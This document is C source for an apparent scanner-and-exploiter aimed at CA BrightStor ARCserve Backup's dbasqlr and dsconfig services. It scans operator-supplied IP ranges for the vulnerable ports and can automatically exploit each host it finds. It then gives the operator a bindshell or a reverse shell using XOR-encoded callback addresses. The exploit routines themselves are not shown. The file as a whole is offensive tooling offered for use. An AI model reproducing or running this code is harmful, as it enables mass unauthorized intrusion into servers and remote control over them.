ca brightstor arcserve backup vulnerabilities scanner and exploiter.txt

一些可以实现益出的程序

int
select_shellcode ()
{
int ret;

printf ( "\n" );
printf ( "--[ select shellcode\n" );
printf ( " |\n" );
printf ( " |--" RED "[" NORMAL "0" RED "]" NORMAL " = bindshell\n" );
printf ( " `--" RED "[" NORMAL "1" RED "]" NORMAL " = reverseshell\n" );
printf ( "\n" );
printf ( " $ " );
scanf ( "%d", &ret );
if ( ret != 0 && ret != 1 )
{
printf ( "--[ invalid shellcode!\n" );
exit ( 1 );
}
return ( ret );
}

int
select_vulnerability ()
{
int ret;

printf ( "\n" );
printf ( "--[ select vulnerability\n" );
printf ( " |\n" );
printf ( " |--" RED "[" NORMAL "0" RED "]" NORMAL " = dbasqlr\n" );
printf ( " `--" RED "[" NORMAL "1" RED "]" NORMAL " = dsconfig\n" );
printf ( "\n" );
printf ( " $ " );
scanf ( "%d", &ret );
if ( ret != 0 && ret != 1 )
{
printf ( "--[ invalid option!\n" );
exit ( 1 );
}
return ( ret );
}

int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;

printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" 
YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e"
NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );

FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );

while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );

if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
usleep(10);
}
}

void
connect_to_bindshell ( char* tip, unsigned short bport )
{
int s;
int sec = 5; // change this for fast targets
struct sockaddr_in remote_addr;
struct hostent* host_addr;

if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
fprintf ( stderr, "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}

remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( bport );

if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ sleeping %d seconds...\n", sec );
fall_asleep ( sec );
printf ( "--[ connecting to %s:%u...", tip, bport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( RED "failed!\n\n" NORMAL);
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
shell ( s, tip, bport );
}

void
fall_asleep ( int sec )
{
sleep ( sec );
}

void
header ()
{
printf ( YELLOW " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" NORMAL );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}

void
parse_arguments ( int argc, char* argv[], args* argp )
{
int i = 0;

while ( ( i = getopt ( argc, argv, "t:l:p:" ) ) != -1 )
{
switch ( i )
{
case 't':
argp->tip = optarg;
break;
case 'l':
argp->lip = optarg;
break;
case 'p':
argp->lport = atoi ( optarg );
break;
case ':':
case '?':
default:
usage ( argv[0] );
}
}

if ( argp->tip == NULL || argp->lip == NULL || argp->lport < 1 || argp->lport > 65535 )
usage ( argv[0] );
}

void
start_reverse_handler ( int cbport )
{
int s1, s2;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );

bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );

printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!\n" );
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!\n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[ incomming connection from:\t" YELLOW " %s\n" NORMAL, inet_ntoa
( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}

void
start_scanner ( args* argp )
{
int i;
int s;
int fd;
int sc;
int option;
int ip1 = 0, a = 0;
int ip2 = 0, b = 0;
int ip3 = 0, c = 0;
int ip4 = 0, d = 0;
int status = 0;
char scan_ip[256];
char end_ip[256];
char line[256];
char system_time[64];
unsigned short port;
unsigned short xoredcbport;
unsigned long BRUTE_DELAY = 100000;
unsigned long MAX_CHILDS = 40;
unsigned long xoredcbip;
time_t ticks = time ( NULL );

bzero ( &scan_ip, sizeof ( scan_ip ) );
bzero ( &end_ip, sizeof ( end_ip ) );
bzero ( &system_time, sizeof ( system_time ) );

printf ( "\n" );
printf ( "--[ enter IP-range\n" );
printf ( " |\n" );
printf ( " |--" RED "[" NORMAL "start-ip" RED "]" NORMAL );
printf ( " $ " );
scanf ( "%s", scan_ip );
sscanf ( scan_ip, "%u.%u.%u.%u", &ip1, &ip2, &ip3, &ip4 );
if ( !isip ( scan_ip ) )
{
printf ( "Invalid IP!\n" );
exit ( 1 );
}
printf ( " `--" RED "[" NORMAL "end-ip " RED "]" NORMAL );
printf ( " $ " );
scanf ( "%s", end_ip );
sscanf ( end_ip, "%u.%u.%u.%u", &a, &b, &c, &d );
if ( !isip ( end_ip ) )
{
printf ( "Invalid IP!\n" );
exit ( 1 );
}
printf ( "\n" );
printf ( "--[ select port to scan for\n" );
printf ( " |\n" );
printf ( " |--" RED "[" NORMAL " 6070" RED "]" NORMAL " = dbasqlr\n" );
printf ( " `--" RED "[" NORMAL "41523" RED "]" NORMAL " = dsconfig\n" );
printf ( "\n" );
printf ( " $ " );
scanf ( "%u", &port );
if ( port != 6070 && port != 41523 )
{
printf ( "--[ I`m only scanning for port 6070 and 41523!\n" );
exit ( 1 );
}
printf ( "\n" );
printf ( "--[ I can try to exploit the bug, shall I ?\n" );
printf ( " |\n" );
printf ( " |--" RED "[" NORMAL "0" RED "]" NORMAL " yes, try it!\n" );
printf ( " `--" RED "[" NORMAL "1" RED "]" NORMAL " no, i`am on my own!\n" );
printf ( "\n" );
printf ( " $ " );
scanf ( "%u", &option );
if ( option != 0 && option != 1 )
{
printf ( "--[ invalid option!\n" );
exit ( 1 );
}
if ( option == 0 )
sc = select_shellcode ();

if ( ( fd = open ( "scan.log", O_CREAT | O_WRONLY | O_APPEND, S_IREAD | S_IWRITE ) ) == -1 )
{
printf ( "open failed!\n" );
exit ( 1 );
}

snprintf ( system_time, sizeof ( system_time ) -1, "\nDate: %s\n\n", ctime ( &ticks ) );
if ( write ( fd, system_time, strlen ( system_time ) -1 ) <= 0 )
{
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
}

printf ( "\noO---[ scanner - scan.log ]---Oo\n\n" );

while ( 1 )
{
if ( ip3 > 254 ) { ip3 = 1; ip2++; }
if ( ip2 > 254 ) { ip2 = 1; ip1++; }
if ( ip1 > 254 )
exit ( 0 );

for ( ip4; ip4 < 255; ip4++ )
{
i++;
bzero ( &scan_ip, sizeof ( scan_ip ) );
snprintf ( scan_ip, sizeof ( scan_ip ) -1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4 );
usleep ( BRUTE_DELAY );
switch ( fork () )
{
case 0:
{
switch ( is_open ( scan_ip, port ) )
{
case 0:
{
printf ( "[%s:%d] " GREEN "open" NORMAL "\n", scan_ip, port );
bzero ( &line, sizeof ( line ) );
snprintf ( line, sizeof ( line ) -1, "[%s:%d]\n\n", scan_ip, port );
if ( write ( fd, line, strlen ( line ) -1 ) <= 0 )
{
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
}
if ( option == 0 )
{
printf ( "\n" );
printf ( "oO---[ exploitation ]---Oo\n" );
printf ( "\n" );
s = connect_to_remote_host ( scan_ip, port );
switch( sc )
{
case 0:
{
if ( port == 6070 )
{
if ( exploit_dbasqlr ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( scan_ip, 4444 );
break;
}
else
{
if ( exploit_dsconfig ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( scan_ip, 4444 );
break;
}
}
case 1:
{
if ( port == 6070 )
{
xoredcbip = inet_addr ( argp->lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( argp->lport ) ^ ( unsigned short ) 0x9999;
if ( exploit_dbasqlr ( s, xoredcbip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
start_reverse_handler ( argp->lport );
break;
}
else
{
xoredcbip = inet_addr ( argp->lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( argp->lport ) ^ ( unsigned short ) 0x9999;
if ( exploit_dsconfig ( s, xoredcbip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
start_reverse_handler ( argp->lport );
break;
}
}
}
}
break;
}
case 1:
printf ( "[%s:%d] " RED "closed" NORMAL "\n", scan_ip, port );
break;
default:
printf ( "[%s:%d] " RED "closed" NORMAL "\n", scan_ip, port );
break;
}
exit(0);
break;
}
case -1:
{
printf ( "fork failed!\n");
exit ( 1 );
break;
}
default:
{
if ( i > MAX_CHILDS - 2 )
{
wait ( &status );
i--;
}
break;
}
}
if ( ip1 == a && ip2 == b && ip3 == c && ip4 == d )
{
close ( fd );
printf ( "\noO---[ scan completed ]---Oo\n\n" );
exit ( 0 );
}
}
ip4 = 1;
ip3++;
}
}

void
usage ( char* name )
{
int i;

printf ( "\n" );
printf ( "Note: all switches have to be specified!\n" );
printf ( "You can choose between bind and cb shellcode later!\n" );
printf ( "\n" );
printf ( "Usage: %s -t -l -p \n", name );
printf ( "\n" );
exit ( 1 );
}

int
main ( int argc, char* argv[] )
{
int s, action, vuln, sc;
unsigned long xoredcbip;
unsigned short xoredcbport;
args myargs;

system ( "clear" );
header ();
parse_arguments ( argc, argv, &myargs );
if ( !isip ( myargs.tip ) )
{
printf ( "Invalid Target IP!\n" );
exit ( 1 );
}
if ( !isip ( myargs.lip ) )
{
printf ( "Invalid Connect Back IP!\n" );
exit ( 1 );
}
action = select_action ();
if ( !action )
start_scanner ( &myargs );
vuln = select_vulnerability ();
sc = select_shellcode ();
switch ( vuln )
{
case 0:
{
s = connect_to_remote_host ( myargs.tip, PORT_DBASQLR );
switch( sc )
{
case 0:
{
if ( exploit_dbasqlr ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( myargs.tip, 4444 );
break;
}
case 1:
{
xoredcbip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;
if ( exploit_dbasqlr ( s, xoredcbip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
start_reverse_handler ( myargs.lport );
break;
}
}
break;
}
case 1:
{
s = connect_to_remote_host ( myargs.tip, PORT_DSCONFIG );
switch( sc )
{
case 0:
{
if ( exploit_dsconfig ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( myargs.tip, 4444 );
break;
}
case 1:
{
xoredcbip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;
if ( exploit_dsconfig ( s, xoredcbip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
start_reverse_handler ( myargs.lport );
break;
}
}
break;
}
}
}